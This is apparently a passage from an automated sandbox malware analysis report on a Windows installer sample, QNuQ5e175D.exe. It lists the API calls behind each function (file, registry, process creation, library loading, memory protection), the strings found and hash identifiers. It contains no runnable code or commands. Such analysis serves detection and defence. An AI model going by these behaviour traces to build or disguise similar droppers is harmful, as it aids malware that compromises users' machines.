                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-2042855515
                                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                        APIs
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                          • Part of subcall function 00405ACB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,00000000,000000F0), ref: 00401672
                                                        Strings
                                                        • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 00401665
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                        • API String ID: 1892508949-3533886424
                                                        • Opcode ID: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                        • Instruction ID: 104414052cab316a424bfe0d2ff1de268c148956b102069c6a2fab9df067ebf3
                                                        • Opcode Fuzzy Hash: 522b783c9de46c7eb01671ee67dcdc22f4b8e2acc15c0cd2b2b5e6563b12514b
                                                        • Instruction Fuzzy Hash: 0911BE31804514ABCF206FA5CD01AAE36B0EF14368B25493BE941B22F1C63A4A41DA5D
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,004066B6,80000002), ref: 0040648B
                                                        • RegCloseKey.KERNELBASE(?), ref: 00406496
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: Call
                                                        • API String ID: 3356406503-1824292864
                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction ID: 39ab2095516423f533248995afa5b88f9e2e33bd0920f2eea258779ff0fd120f
                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction Fuzzy Hash: AB017C72500209AADF21CF51CC09EDB3BACFB55364F01803AFD1AA21A0D778D964DBA8
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 334405425-0
                                                        • Opcode ID: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                        • Instruction ID: ae41dde4eff0046a081fa93f434b6203791b13f397c20c3345ef6f3f33f6a532
                                                        • Opcode Fuzzy Hash: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                        • Instruction Fuzzy Hash: 4B21A131904104EACF10AFA5CF89A9E7A71BF44369F30413BF105B91E5CBBD99829A2D
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Global$AllocFree
                                                        • String ID: Call
                                                        • API String ID: 3394109436-1824292864
                                                        • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                        • Instruction ID: b741a03fd702b7c6772e3f95c256d95ec8b7de3af2fdc922703a565136a7d287
                                                        • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                        • Instruction Fuzzy Hash: 9521F372904150EBDB20ABA4EE85E6E33B8AB04718715063FF542B72D5C7BCE8409B9D
                                                        APIs
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        • lstrlenW.KERNEL32 ref: 00402364
                                                        • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                        • String ID:
                                                        • API String ID: 1486964399-0
                                                        • Opcode ID: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                        • Instruction ID: efc15b5f6e7b569f76b1b900a6dd714e3f258eaed93f5a56bcbfb146dffa85c7
                                                        • Opcode Fuzzy Hash: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                        • Instruction Fuzzy Hash: 94118671914318AADB00EFF58D0AA9EB7F8AF04314F10443FA405F71D5D7B8C9418B69
                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                        • Instruction ID: 66810f11062e6ea255b80fddf1e3d4c9698f673e023b75e7ff91682f7f8ae36f
                                                        • Opcode Fuzzy Hash: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                        • Instruction Fuzzy Hash: 43017C71A04615ABEB149F94DE58AAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                        • Instruction ID: 5bae25e85081f80c41e61f77185b89043c8d74e7c66b6edfbb666f5a0c3c1719
                                                        • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                        • Instruction Fuzzy Hash: 45118C71904216EADF15DFA0CA599AEB7B4FF04348F20443FE402B62D0D3B84A45DB9E
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                        • GetLastError.KERNEL32 ref: 00405B1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • Part of subcall function 004068FB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • Part of subcall function 004068FB: wsprintfW.USER32 ref: 0040694D
                                                          • Part of subcall function 004068FB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        APIs
                                                        • CreateFileA.KERNELBASE(00000000), ref: 73B02C57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        APIs
                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileMove
                                                        • String ID:
                                                        • API String ID: 3562171763-0
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                        • Instruction ID: c79ba5cb2d88364bafa4f5c49a43b48020d8ed27846d342f9c81a2b2dcc73f01
                                                        • Opcode Fuzzy Hash: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                        • Instruction Fuzzy Hash: 9BE06D71904104ABDB00ABA5AE498FE73B9EB80355B20443FF101B04D4C77858109A2D
                                                        APIs
                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 0040643B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BD,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040612D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403507,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(73B0505C,00000004,00000040,73B0504C), ref: 73B02A9D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406472,?,?,?,?,Call,?,00000000), ref: 00406408
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 00403518
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00405BAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID:
                                                        • API String ID: 587946157-0
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,004042EF), ref: 00404522
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        APIs
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                          • Part of subcall function 00406A16: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A27
                                                          • Part of subcall function 00406A16: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A49
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                        • lstrcmpiW.KERNEL32(Call,0042CA68,00000000,?,?), ref: 00404B4E
                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404B5A
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                          • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • Part of subcall function 00406825: CharPrevW.USER32(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                          • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                          • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                        • API String ID: 2624150263-2762731361
                                                        APIs
                                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                        Strings
                                                        • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 0040228E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                        • API String ID: 542301482-3533886424
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
